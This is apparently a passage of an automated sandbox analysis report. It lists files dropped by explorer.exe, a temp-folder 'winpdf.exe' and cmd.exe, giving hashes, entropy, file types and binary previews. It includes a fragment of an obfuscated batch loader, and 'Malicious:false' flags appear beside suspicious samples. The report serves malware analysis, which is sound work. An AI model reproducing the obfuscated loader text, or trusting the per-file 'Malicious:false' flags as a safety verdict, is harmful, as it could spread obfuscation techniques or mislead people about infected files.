                                                                                                                                                              Preview:=.&.PA30Nlr......^............I%....Q..E.Z.2^$............. ..h[..<................++...=.........." .......A..............o...!.....a233TTTTUfVw..##..h.sCCSUw......wgXX.d2C4Eex.....xwv....!....Q$.C...Y..U.ZL..[..=.1.. as...;|Nz.62....f..yV...x.y...8....W+.2..H..%.....`M;..)E;...{A....x........6.............x...\@}a........A][B...!.OPX.WYV#.e9R.fj@..'.A7.).4.!.....]...............@.3....!@`?:.......(....@.....d.......0.N.!.6...&..........B.......W .....*......AB.w...O..{..+.....O!C.+..?...?..'q.7.G.pg.g.A!.........3.p...|....'a...c.(\.../...$...0.../.G....g~..r....q.O...."Qa~.f.Hpp.~.0,4.&0.H..3.....7....I.s#P$.?....P..G`..1?.b^H(..?..@.?..3........q...b.H,..g...PHp....)0.'P.G`~.8.....A....._......~..1....S. ..(....;..:..A....q,.`_Q..&:.5$.b....`...$a ...LL@..B@G..........".._$8....".......g@...7....|.A@.....w...4....4..?.4.`...7..........a@...5 ..;..).+......s`.......}..>..=N9GI....@...sh..%..C?.S1.J!......)..d&.... ......88...S.CZ.!% T..h4..@.`.q.E.wvF3D...
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):12800
                                                                                                                                                              Entropy (8bit):4.703646249615889
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:pOMUgMuF9z0lWc37O4R30jKRyR1C/jjjjjas+7atDgx7PuEcWZf2P4WwrW:k7gzF9z0lWcrOjjkyR1CTSDZBWwrW
                                                                                                                                                              MD5:B7D6A6BB752E0F3B336FE9F48F2BD17F
                                                                                                                                                              SHA1:B2C212468D9E4988A13EBF5B8397FC864E958D4A
                                                                                                                                                              SHA-256:6AAFA6D7EE7B50F43A1A74F518132AD1F9E0CA2C7C1C83CB0508E716A7EEF276
                                                                                                                                                              SHA-512:0210AF854EA1504D1D15B17979E3FB3140C3DDF037DBB828C42E4B656F93696744AA1F88C2E94E67781EAA16D923B69FB016D30E99879CCA41F69FE9E3B1004D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Tz....i...i...i..c....i..pj...i..pm...i...h...i..ph...i..pl...i..pi...i..pa...i..p....i..pk...i.Rich..i.........PE..d.....t!.........." ......... ......0................................................9....`A.........................................8.......8.......`..8....P...............p..D....3..T............................0...............1...............................text...0........................... ..`.rdata.......0......................@..@.data...X....@.......&..............@....pdata.......P.......(..............@..@.rsrc...8....`.......*..............@..@.reloc..D....p.......0..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5120
                                                                                                                                                              Entropy (8bit):3.6408151632411823
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:UBJvWcl8ClOolTPJlnrO0Q/LnPDQ6g6HQS+EWI4sWwB:kJxaCgohRF94gDzSTWI4sWW
                                                                                                                                                              MD5:BC5D54311D229EACEB98977248A3E44C
                                                                                                                                                              SHA1:0011AE8085B6409A944A9E431652D9CAFBCFCE48
                                                                                                                                                              SHA-256:32737C8E34B90B7F0D57B607B07B641F7B8A80AE4797856C6CB8CCBF8C1414FE
                                                                                                                                                              SHA-512:09BFF5F078A0834E8AC11A02FC57763AAC1224E06D0ECF7940AF38D2BC5E41B38FF5D508BD1C8A73B46C68A3C01916D1ED2E18925E0B1D2FE6D10D422AD7B4B8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L..................!.........................................................0......0J....@.......................................... ..$...............................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....|..{........T...8...8.......|..{........$...................8....rdata..8...x....rdata$zzzdbg.... ..p....rsrc$01....p!.......rsrc$02.... ....K.....o.....#k..w..2....|..{........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):104960
                                                                                                                                                              Entropy (8bit):3.868055965362207
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:1iSLYz5Eotn0mdTnLJgAAn8vmZZrrtHBIE:1iSLYzOg0kTnLinmmZZ9hIE
                                                                                                                                                              MD5:0EC2F54AF7A73C0281E0B7BA5A40ABCB
                                                                                                                                                              SHA1:6D1B10FA5B1563307278B974DE0A131452DD6641
                                                                                                                                                              SHA-256:F80FCC0E391B6A9A881E1D44E7A4B521CB54134E32DDE6E5B57D68DA7C75A1E8
                                                                                                                                                              SHA-512:8D43CAA8023D35AAFD87EBD76970FB54411D2E7709D7C89CE0831D6D1931EF22138601AF94DE27DEC53CB326411A47DA588479843CA07CF920D8177B5FA233FD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....................................R....................(................Rich...........................PE..d...2. b.........." ................................................................a.....`A............................................p...p................... ...............4...0~..T............................!..............."...............................text...p........................... ..`.rdata...^...0...`..................@..@.data...p............z..............@....pdata.. ............|..............@..@.rsrc................~..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):577024
                                                                                                                                                              Entropy (8bit):5.941146933733838
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:pc2FNfvfmoCR9/TQ462FRdQgLpNhY7pjiUk:ZmZJ62FR2gNNhcq
                                                                                                                                                              MD5:CF72D2BB801B140D14B5EF94A7193333
                                                                                                                                                              SHA1:A012220FE3A7AA1866EBEE06EEAEFF5488224D21
                                                                                                                                                              SHA-256:95A8DC32BCE0D7BF43235D7C6F593CBBCEE2EA79D84B955424BC582968D737E4
                                                                                                                                                              SHA-512:F8C5A8C4CFB8CC90710CC88F29885A174161E7123EE16EE4A3165CA0AA3074F3A7C6A93761FDF7A387A187F53FD3FED952F6E285A23485C56BE7EF0631D3180D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3...]...]...]......]..Y...]..^...]...\...]..\...]..X...]..]...]..U...].....].._...].Rich..].........................PE..d.....%l.........." .....h...j......0G.......................................0............`A........................................p=.......>...................0..............<C.....p...........................................(.......p3.......................text....g.......h.................. ..`.rdata...............l..............@..@.data........`.......F..............@....pdata...0.......2...P..............@..@.didat..............................@....rsrc...............................@..@.reloc..<C.......D..................@..B........................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):25347
                                                                                                                                                              Entropy (8bit):7.9790494358638995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:ImljMJ48qjDELoE1AOwBpqMcBiyiETh0v+v4:Iml+48qjUuuriqTs
                                                                                                                                                              MD5:2ACB0C8EB5B30A91B246530968927EFD
                                                                                                                                                              SHA1:F5D0E77682643AF7B28D25862C65DE17943B8865
                                                                                                                                                              SHA-256:C33F8B5EF6B87F29FBFDEE4B8C727AC427CA279B83E1A5F6C32B406A3E3BB7D4
                                                                                                                                                              SHA-512:228679A1C8E8A515BA4B5DEA893779D4E34105A0BC4DB4F3E88F11253029D4A6E9CA0665AF9C6CAFF831627B9B5AE7C7B91F12B57C79AEF6B561DF8B0B512163
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.g..PA30.OX'.....^......8#.....r.........33................(a[..,............**..."...=.........."...8....p.?.../......o.....?A.|.....hd.............fJj........................9..P......x..@....,!..g..4!...M..!...M..!...&..........W......(...)...V......&...$$.{....8..?0...).2._....pF...............W..p@....p./`A....b...~....$L.....). .l..d.....VR.............X.P.@..K.f.......`...H....J8 a......N...;.w..t...}.TmXp2..<...+`...p@..;_.z.L..{....`.;H....t`......\b/ ......z...b....- z.>sJ1..s...N"^....O........Mf...}..$........p@.D@..{......C..d98.;.W8.............0o``.A1.....`0..(|..`..K..........!...@LO...? ......|...L8.p.......@.........!.2`...7..........cH ..o.p..k.@..EPA..........1P.C"..1.V..!...., .P$....X...s......1.)p.q.p....!... ~..b5...........I......9...hC.....a.t...8...@.b.sd..O.T...*............\.u.2..#..xxH..PN<]..G#.....J.5\..YW.\..p'...{xd...w...=.=<.....N6..%q.p'.......h..."....p...D...p.w.*<..A.8. ".%.M...$h..%......+..O.XV..U..j...tZ.
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24598
                                                                                                                                                              Entropy (8bit):7.987495493200845
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:LU6A2OCYMfVKirkrym2d2Ft5n0IKqGFrXS5iLvQyZ2ZLo1SrDriIrlngLVX:LwrCd9krvR3KqGJiKQyUBo6eIr6x
                                                                                                                                                              MD5:C9D97269A33C6769582C81D880F78A1C
                                                                                                                                                              SHA1:E3C04DAD51E127ADA2F833A2220594D2B34C572C
                                                                                                                                                              SHA-256:E8C29C666618EF4C7F2406883E0AA06597CC794B304073B555E1520016FAC8E6
                                                                                                                                                              SHA-512:B6DE144CB010FC3A400B04C5A976A97BE3D6C1D99FF24C30BDC0E00EE8F77D8C5D6DBC0449651DF3A3342C79566FE1BAB26A67968B90F3EAD7323947145AB1ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.qp.PA30a.s......^.......#.......O>..A{.{l.....................W^..,............**..."..............;....../...................'../............Y..._\...[.U.LU.a.......U.U.=%.....o....~z.......).y.....|..y.....|..y.....|..?.8?.3.....H|.............H....`^.....{..._y..W......!..._..J._y......... b.N.....ox..........b..........R.o .`...(.r.a....+.@...I.K4.^...Y9.Z..Vx.WS..B.`..b!...*.h.l.....z.tz.......;./`=.k......$...............2....Y.8......*.C....4Z...%...C...A.......(t..P..;4|.&.....sSpn.......'`...ny. ..H,2Q..v.b...q..>.b.y.y.y .6.P..;....;..........?..........+.<.l.5..5oH.P....~..v....C(....J..h@.R...p...4.@../..J....... q.9?......../...W.B];..`.o....L.....0L.?0....|(...@B..../E.H..P. .......NA....A.............'A.$`...B`?..c.#@"..1.c...p0g......V.2..W.........L4.0p@..o..1.s..T..p:..pH..!.G..C=%.%....Q.+..3..(...@.g.......4...*......w......v7...yx87.<.n...<\d.-......7.7.......Ps.s........]l......?<<.H8.....[..o....qsa..qh........g......@.8r.......7
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):10752
                                                                                                                                                              Entropy (8bit):4.917119327447698
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Qkk3BzHgYRJzJpb+4EzOxauEcWZyWwrW:azHfRJ1pb+4EzOxaDZyWwrW
                                                                                                                                                              MD5:1097D1E58872F3CF58F78730A697CE4B
                                                                                                                                                              SHA1:96DB4E4763A957B28DD80EC1E43EB27367869B86
                                                                                                                                                              SHA-256:83EC0BE293B19D00ECA4AE51F16621753E1D2B11248786B25A1ABAAE6230BDEF
                                                                                                                                                              SHA-512:B933EAC4EAABACC51069A72B24B649B980AEA251B1B87270FF4FFEA12DE9368D5447CDBE748AC7FAF2805548B896C8499F9ECEEED2F5EFD0C684F94360940351
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.(.D.{.D.{.D.{.<0{.D.{./.z.D.{./.z.D.{.D.{.D.{./.z.D.{./.z.D.{./.z.D.{./.z.D.{./\{.D.{./.z.D.{Rich.D.{........PE..L.....}...........!.........................0...............................p.......+....@A........................@$......|@.......P..8....................`..........T...........................`................@..x............................text............................... ..`.data...\....0......................@....idata..v....@......................@..@.rsrc...8....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):36864
                                                                                                                                                              Entropy (8bit):5.153561346833534
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:C/gOUmKmcVYF82y+hnVeM1LrB0ZqWF6WZT+vBoYd:C/Am0GLKZJ4po
                                                                                                                                                              MD5:D09724C29A8F321F2F9C552DE6EF6AFA
                                                                                                                                                              SHA1:D6CE3D3A973695F4F770E7FB3FCB5E2F3DF592A3
                                                                                                                                                              SHA-256:23CC82878957683184FBD0E3098E9E6858978BF78D7812C6D7470EBDC79D1C5C
                                                                                                                                                              SHA-512:CC8DB1B0C4BBD94DFC8A669CD6ACCF6FA29DC1034CE03D9DAE53D6CE117BB86B432BF040FB53230B612C6E9A325E58ACC8EBB600F760A8D9D6A383CE751FD6ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K......K..H...K..O...K...J..K..J...K..K...K..C...K.....K..I...K.Rich..K.........PE..L..................!.....t...........x...............................................*....@A........................P...n...8........................................s..T............................%..................4............................text....s.......t.................. ..`.data...\............x..............@....idata...............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):412160
                                                                                                                                                              Entropy (8bit):6.440111636589855
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:Zb4spB+uPpnV5dH+V15pyYy8W/czcJauE:Zb4sB+uPpnVHH+hpyYydczcJY
                                                                                                                                                              MD5:02557C141C9E153C2B7987B79A3A2DD7
                                                                                                                                                              SHA1:A054761382EE68608B6A3B62B68138DC205F576B
                                                                                                                                                              SHA-256:207C587E769E2655669BD3CE1D28A00BCAC08F023013735F026F65C0E3BAA6F4
                                                                                                                                                              SHA-512:A37E29C115BCB9956B1F8FD2022F2E3966C1FA2A0EFA5C2EE2D14BC5C41BFDDAE0DEEA4D481A681D13EC58E9DEC41E7565F8B4EB1C10F2C44C03E58BDD2792B3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A4u..U...U...U...-..OU...>...U...>...U...U...T...>...U...>...U...>...U...>..<U...>...U...>...U..Rich.U..........................PE..L....Q.=...........!................pJ....................................................@A................................T....................................l...%..T...............................................P............................text............................... ..`.data...............................@....idata..Z...........................@..@.didat..............................@....rsrc...............................@..@.reloc...l.......n..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7030
                                                                                                                                                              Entropy (8bit):7.958266788621544
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:81ruwbXGT3mZCmm98yKuTOROSR3PdcGy7GeLc9y:ruXCH9DKcOROSR3kcY
                                                                                                                                                              MD5:69B49B3DF8D7FA7A1588EF18B258AE44
                                                                                                                                                              SHA1:9C33EA299609D07CEFDF684D38A4C3BFD6D33B0D
                                                                                                                                                              SHA-256:CCC3FDDDA0894FAEB7745E81E9C1357A51CD9AEEF7326C54A26A1CD5AC5348DE
                                                                                                                                                              SHA-512:31DD915EF296FDFEE70C5684F78B44C2B83CAD21C50A87ACCE6BD4FB31F1DC57F0500D7D6B9F45F437E13F824EA9D7A521CBDB0429C63F19F35D25C557E79756
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:fWU.PA30..s......^..?...(......U|....<+y...:-...............8...Y..,............*....*...=........++. ........?..'.........#......n5bQDC3CcUnn.....^.dUaDcFUD4...^..nn....;.Q0.b...C.._.hR*..M.../P.....iH..r..=....N\.T..Q0(.......2....................e...&0.b ```8...a`.....8..@..A'/p.=+..Ld"...D&..KJCd.......n..qnP.q@.2.h..H`...B.#v......\.Ld".........A............G.(.....((.g..*.!3R.....p........![...0...L@...N^(..._...h...@."C..<......00*.......Ce.....O~..\...l.[...m..I...o%.15.k.o.......r]....f.W.....*..*..u.NK......].*.....t...0...*..Hj..M.?h2Hw.Z^-.ml..U76MGu...n7.AkP...`..H...N..T.T......Q(R.Y..(..A0X.p.(...f...nV..7+....v...r+7n.j.f...$......DZ.Z.u.6s.Yk....&gV...Ve.6....N....&kr5.Y.k.r.".q..|V...ZC....Y.....#.$g0.. .1$lf5.....C..t:.....9.j.\..(.k....P:.m.;...l.^.......Y.........Z.........{......j...N.]U..|.)w.{?..%g.M...2...=B....d...K.`..r..b...vv...o.i.#.0.o......sv3..q.n...d.4....n@.. 1H.. 1.H..4v;@.*.$LOa..+H....U`3$>..@F..a0...C.B
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6648
                                                                                                                                                              Entropy (8bit):7.956463646454614
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:zABbqVw9iWzZ91e1dkT9wMK+LcUYtW+/cipvUUMCMtuf/ORkphTbqn1z3a7J+mBe:6y7Wl91eEwMK+RY9k4yCSu+o5+siDF9
                                                                                                                                                              MD5:D547F124FF89733FE1D641C7D99F0573
                                                                                                                                                              SHA1:923143A6BB4CDEEEE35A1F3931FA08FBAF4046CD
                                                                                                                                                              SHA-256:56587C58E4012F958C2D9A4BA566ACFE701C0E3D988FC171F6AC9D5AEA23AE1F
                                                                                                                                                              SHA-512:12767430FDFDFDDDA5DE896B534AC0CD8A95BB0CD4D72DAE53A3ECBE3E8AF7A2D2DDFF0FCBD94416DF11DE644B3ED1C5725661F2DF00905951569E63361DE286
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...qPA30........^..?............UX..M.C...[.................(]..,............*....*...=.........+. ....................................U....W<.:U..I.....[.....M9.yp.. .>.7...o86F.[8)*.....3p.J ...s{.b+.jA... l....3|.....>.;`..v`.v.A....5]0.?...v f;..i..)....>.......;d @.....%..xPn......G?..~.1.[.j(...C..q.S|..4>.0oP..oh=tDa...`...ie..Gop..G.E.d#!...C.....+..>.`._ q..?j.B=.!. )0D.{..X.B.((f.......Y...i...E....8....@.%....=.2"...(0..:.........*.....4.........f.._.....):.O-.A?H,.!7.b!....>...Xt.X.....[......}.b!..F.c!.........7........u9Dk...i...&'c.k.T.@..v...]...........!...."..$........@@....1I. ...p.....a...@.."..i[X,,#....,..ns.....;s7..;.t.n....=\......dJ...8...2 ..E.....n...==s.......<..n.n....T..]....ps.".1.p.8L.a$(..l..\..#.}.F...!.S)t.;F.;.O..d..U..L...L....\.3...y...2e.\..x....g.e>..2..P..L...=./b2.S..U.i&.2]....{..B(.0..O!HS.N.h.C..A.1..S7w.!.f..7e..n7*.&......vS.uv..@\.....u...v..H......q..5.Z.;...DNT......H..."D..h.H+.G...(i........&...;..h.
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):55296
                                                                                                                                                              Entropy (8bit):7.997140452518294
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:Ds9K6LTrRUkNhqm1vNM+taHesMvtrwK7iBzuwhSg7BkvsGOvywK6EWN9tJJSuN0:DrUNom1vNM+tMXKyuC1kUlBK0zSuG
                                                                                                                                                              MD5:28B289BC32621FA3A3C6084115F0E5B8
                                                                                                                                                              SHA1:D2D44366D34DD1281F12B992AF24C16E19B09E60
                                                                                                                                                              SHA-256:CE1CD39A69CCC3EF31F93EDA2BCFADA9D12FE6D95B0CCF9AFDFFB1A608173C46
                                                                                                                                                              SHA-512:02E649D96139915F955D62554890B23A6CE437F8002B0B57F14ACE79496A5719863C6C8DF32E8C853352B401A32A84242116887A33C4E52CBD53A55025DA4C2C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:W...,.q<.\C.d7.....oE~..'H....4.$...G.V..s.H{ee....?..d.t..L!v9'....qX*...1.@....bq..p.......hJ&<.......l.....Jt(......E. ....euy...Hh...aCb.....= ...qp..L.C..S..[..(.......M.#"..:..h..W%....^q0.i....r..Y...m&.p.0F..6.C......d.?..._GC.......Tc..#dP.=%.P..I.W..}.Y.la9YG..B.G.q..,*{..)u..#..=.`.Sc.g.......<|.``,.>..ql........#...4.."YO_.).......P..}...S.[.p.Y..S.d..%B..x...K....zP5....L.3n.D..}.z.9.......Q.-.".Hm..z..9.Z.......T........x./.U@.y....6V.G.#.....*.y..V....'L...9g7hQ;....Z.......n..5......P.....B..q)2.q.!S^.y..E.t...^G... ..@..Y......,.L..|..W...O..z?..l..+|H...8.f......F....e...F.........^.... .^..e..U:....c.)..\.|^...$|..-r`.......:.8W....f[..&.............t....F6......I...P*.....9.y.H=H:w..i.1...%.<...!.!o..r...... .T....:....c........'....bd....d..R....."....fF.........9.......U.^.8.*U...-.,\..v...S..c.5J.......X 6.3-k}]+.r........s.!...N...n.....ggk..4...2..b.RA...i.(..!.....YUI......?....TU.......+|.....<.?.b.3zt..?..
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):74752
                                                                                                                                                              Entropy (8bit):7.9977985959801865
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:1536:+JH3YifRPpkifebp4/V/6q+VNAzJNVZulyyT6S817DSChcENEF3:WH39PiqecN+VazVZulT6S23SCCENEF3
                                                                                                                                                              MD5:544AACC8AF7484511C782349145966E5
                                                                                                                                                              SHA1:0DE683BA745DD7D97C81B87B1150B364007CC46B
                                                                                                                                                              SHA-256:E2981B1157B5A459981F18ED867EFD0817E135852CAC33C2DA996185A1F9045E
                                                                                                                                                              SHA-512:CE03D318A93541B6E90ABE12A9B1E40A49FA3C6B2F8DF3AE97801560C472BBC3E1A80D0E837EFEF0998ACA78FC73766DB75ED607AC7CC29C9994043CFEEE8CFE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.1f..)?.q.zs..~..|.V^.<....'.2...e...pB....".....A.w.u.=......$j..2.j#E...............i.....U.Q....*........G.\.....XN..A.'.......v`wr.......\..%......%.d..X.D.w3..q.......U..O.Z'..Z..|3.{.{Kqh.c.x../..X.....~....iD...n:...Rcac.(8k...%..h.9.8G,.<.?....H5.oWQ.f.r.\.*.[.^.....z...tmf.$...N..lf..\K.'H...P.O.....O_U.F..;lk..B.sdY<&..1.j..27.Pq...8..S.s....A.@..#.!.#.ec..ATY;...U..%.|.$<..W.{.o...x.<.....M]<...x......2T.....{...&..)...?&Tw../..b.2...qvb.~*i.8..YD......5.s.-...7&..%j(XxqS..@c...F..x.R+.>.....G..x.3:.._.IoKE...I.....D9.P.`{..x..O....3m...n.[.....Oxa....P...?`..f.b.i.H<.......uw*.y.*qC.~.....#q....L"....2.....iq.W...c_A..X..EXtg.~.........oT..*.._$.X..a.#...k;.z.'.a.c.c.-7m.".$.11`).J..._.......!.8u.!.I.|O.g..E./..i./..).9|^.B.....T..%Hoj...9..i......&.X..kx..].h....E!.bI...S....#.....(+..'.i..{..Cmq^......}[..*.....~l..(........>.X.-:.ac*h..~.'..Y>1#c....&.xz..*"D .|..>:kA.m.Y3t....6lp....6t.'..*...g.l4.|.'.6..}.".YYG.0..&Ob
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\winpdf.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1358), with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):25572
                                                                                                                                                              Entropy (8bit):5.1065254734459495
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:YCGxHqm/HcHI7JF7/lehgp9L8M9mUz68xyK6dPhKiZCIPYHyOM+UVlxYF4j4XuSg:YCQh7DTlNp9MU/l61xIRyS0NwrvO1r
                                                                                                                                                              MD5:A2714DC6ADC59906C8FCCDBBDF301AE7
                                                                                                                                                              SHA1:5E15A38B8EBB0853FADD0532E441961817486FC1
                                                                                                                                                              SHA-256:670211558FC624D950A04533EAAC9DC4F0A93E40FCE2E5E6CE06F1415A4D8821
                                                                                                                                                              SHA-512:E5602D6F72B6DCF1B3F2DFD3EE4421196975DB6B1357F6A9A09E2A0534B2FD6D33F37D7E6BD4D5E068BAEF81D7ED290A84A93551C6A830CCBBE8638F1CB89445
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Set Accepted=r..bjyParagraph-Skirts-..jbMartha-..GOqArena-Resolved-Wallet-Lion-Une-..MybMOpen-Tract-Vertical-Nintendo-Throws-Repair-..LIIJStructures-Utils-Please-Convertible-Development-Vault-..scOccasions-Heavily-Interactions-Tampa-Ccd-Psi-Ottawa-Left-..LVHospital-Exhibition-..cHMAssist-Financing-Score-Gardening-Chains-Boutique-..Set Border=F..ExvuShown-Bomb-Reflected-Giant-Intensive-Rss-Side-Scale-Transmission-..ErWork-Salmon-Dial-Company-Variables-Graphics-Explanation-..zCrShopping-Jamie-Numeric-Change-Shame-Distributed-Houston-..wZDist-Projector-Sk-..lAaJUnavailable-Austria-Experienced-Direction-Peru-..Set Findings=B..mYsGuru-Posts-Zoophilia-Zealand-..mbUltra-Via-Generation-Hdtv-Driving-Istanbul-Procedure-Bikini-..nBaSsl-Global-Wan-Hollywood-..mQWJoyce-Discover-Brochures-Inbox-..HxMind-Global-Upset-Wesley-Mattress-Brake-Forest-Profiles-..TwBAcrobat-Intel-..qDfwMacro-Admin-Pearl-Ts-Maritime-Islamic-..fRApproved-Prompt-Papers-..Set Mar=S..EtMatthew-Meditation-Identifying-..XBBali-Swi
                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1358), with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):25572
                                                                                                                                                              Entropy (8bit):5.1065254734459495
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:YCGxHqm/HcHI7JF7/lehgp9L8M9mUz68xyK6dPhKiZCIPYHyOM+UVlxYF4j4XuSg:YCQh7DTlNp9MU/l61xIRyS0NwrvO1r
                                                                                                                                                              MD5:A2714DC6ADC59906C8FCCDBBDF301AE7
                                                                                                                                                              SHA1:5E15A38B8EBB0853FADD0532E441961817486FC1
                                                                                                                                                              SHA-256:670211558FC624D950A04533EAAC9DC4F0A93E40FCE2E5E6CE06F1415A4D8821
                                                                                                                                                              SHA-512:E5602D6F72B6DCF1B3F2DFD3EE4421196975DB6B1357F6A9A09E2A0534B2FD6D33F37D7E6BD4D5E068BAEF81D7ED290A84A93551C6A830CCBBE8638F1CB89445
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Set Accepted=r..bjyParagraph-Skirts-..jbMartha-..GOqArena-Resolved-Wallet-Lion-Une-..MybMOpen-Tract-Vertical-Nintendo-Throws-Repair-..LIIJStructures-Utils-Please-Convertible-Development-Vault-..scOccasions-Heavily-Interactions-Tampa-Ccd-Psi-Ottawa-Left-..LVHospital-Exhibition-..cHMAssist-Financing-Score-Gardening-Chains-Boutique-..Set Border=F..ExvuShown-Bomb-Reflected-Giant-Intensive-Rss-Side-Scale-Transmission-..ErWork-Salmon-Dial-Company-Variables-Graphics-Explanation-..zCrShopping-Jamie-Numeric-Change-Shame-Distributed-Houston-..wZDist-Projector-Sk-..lAaJUnavailable-Austria-Experienced-Direction-Peru-..Set Findings=B..mYsGuru-Posts-Zoophilia-Zealand-..mbUltra-Via-Generation-Hdtv-Driving-Istanbul-Procedure-Bikini-..nBaSsl-Global-Wan-Hollywood-..mQWJoyce-Discover-Brochures-Inbox-..HxMind-Global-Upset-Wesley-Mattress-Brake-Forest-Profiles-..TwBAcrobat-Intel-..qDfwMacro-Admin-Pearl-Ts-Maritime-Islamic-..fRApproved-Prompt-Papers-..Set Mar=S..EtMatthew-Meditation-Identifying-..XBBali-Swi
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
